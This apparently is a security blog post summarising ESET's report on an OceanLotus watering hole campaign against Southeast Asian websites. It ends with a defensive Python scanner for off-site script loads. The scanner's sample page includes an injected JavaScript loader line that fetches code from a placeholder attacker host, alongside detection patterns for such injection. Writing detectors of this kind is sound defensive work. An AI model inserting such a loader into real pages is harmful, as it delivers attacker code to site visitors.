Thursday, December 13, 2018

Woesnotgone Meadow; December 2, 2018

All is relatively well here at Woesnotgone Meadow, where everyone has above average bandwidth. This time of year the air begins to turn a bit chilly as the season changes from fall to winter, and the dogs bring the mud into the house. In Woesnotgone Meadow, our watering hole is Maggie’s on Main Street. It is the only watering hole in the meadow; in Southeast Asia, however, another watering hole has surfaced, and it is not nearly as pleasant.

This latest issue was discovered by ESET researchers: a new watering hole campaign, attributed to OceanLotus, using several compromised websites. The group is also known as APT32 and APT-C-00 in certain circles. The campaign has targeted users and websites in Southeast Asia and has been in operation since September 2018. From all appearances, it was well planned.

Differentiation
Watering hole attacks are not new to the environment or the industry. One aspect that makes this one unique is the large number of compromised websites, at least 21, involved in the attack. It is also unusual in that a handful of the compromised websites are high profile (e.g. the Ministry of Defense of Cambodia and the Ministry of Foreign Affairs and International Cooperation of Cambodia).

Curiously, it also targeted several Vietnamese newspapers and blog websites. Watering hole attackers usually focus on websites their specific targets regularly visit; this attack, however, focused on websites visited by many people.

Evolving Attack
As noted, this is not a fresh attack format. The OceanLotus Advanced Persistent Threat (APT) group began operating in 2014. This specific attack appears to have begun as OceanLotus Framework B in 2017, with subsequent updates producing the latest version. The current version uses public key cryptography to exchange an AES session key, which improves the security of its communication and prevents security products from intercepting the payload.

Stealth
On the range of attack complexity, this is not at the basic end of the spectrum. To produce this more complex attack, the attackers used a first and second stage process on the compromised websites.

Responsible Reporting
The researchers notified the compromised websites in October 2018. The issue was not, however, fixed until late October 2018.

Attack
The attack process is relatively straightforward. A person visits the compromised site, where users are tricked into installing a fake installer or updater for commonly used software. To get there, the attackers added a small amount of JavaScript to the site's index page or, alternatively, to a JavaScript file hosted on the same server. That code then loads a new script from a server controlled by the attackers.
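A site owner checking for the footprint described above, a small injected script that loads more script from an attacker's server, can scan pages for script loads that point off-site. The following is an added example written for this post, not ESET's or the blog's code; the site host, the allowlist and the sample page are constructed assumptions.

```python
# Added example for this post, not ESET's or the blog's code: flag <script>
# loads that point off-site. Site host, allowlist and sample page are assumed.
from html.parser import HTMLParser
from urllib.parse import urlparse
import re
SITE_HOST = "www.site-placeholder.example"           # assumed: the site's own host
ALLOWED_HOSTS = {"cdn.allowed-placeholder.example"}  # assumed: approved third parties
# Constructed sample: local script, allowed CDN, injected loader, inline injector.
SAMPLE_HTML = """<html><head>
<script src="/static/app.js"></script>
<script src="https://cdn.allowed-placeholder.example/lib.js"></script>
<script src="https://stats.badhost-placeholder.invalid/a.js"></script>
<script>
var s=document.createElement('script');s.src='//update.badhost-placeholder.invalid/x.js';
document.head.appendChild(s);
</script></head><body>hello</body></html>"""
DYNAMIC_LOADER = re.compile(r"""createElement\(\s*['"]script['"]\s*\)""", re.I)
URL_IN_JS = re.compile(r"""['"]((?:https?:)?//[^'"\s]+)['"]""")

class ScriptCollector(HTMLParser):
    # Collects src values of external scripts and the bodies of inline ones.
    def __init__(self):
        super().__init__()
        self.external, self.inline, self._buf = [], [], None
    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._buf = []          # start capturing an inline block
    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None
    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)

def find_offsite_loaders(html):
    """Return hosts of script loads that are neither the site nor allowlisted."""
    host = lambda url: urlparse(url).hostname or SITE_HOST  # relative path = own site
    p = ScriptCollector()
    p.feed(html)
    hosts = [host(u) for u in p.external]
    for body in p.inline:      # inline code counts only if it injects a <script>
        if DYNAMIC_LOADER.search(body):
            hosts += [host(u) for u in URL_IN_JS.findall(body)]
    return sorted({h for h in hosts if h != SITE_HOST and h not in ALLOWED_HOSTS})
```

Run over a crawl of the site's own pages and served `.js` files, any host reported here that was not deliberately added is worth a closer look, and the same allowlist can seed a Content-Security-Policy `script-src` directive.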

Thanks for visiting Woesnotgone Meadow, where the encryption is strong, and the O/Ss are always using the latest version.
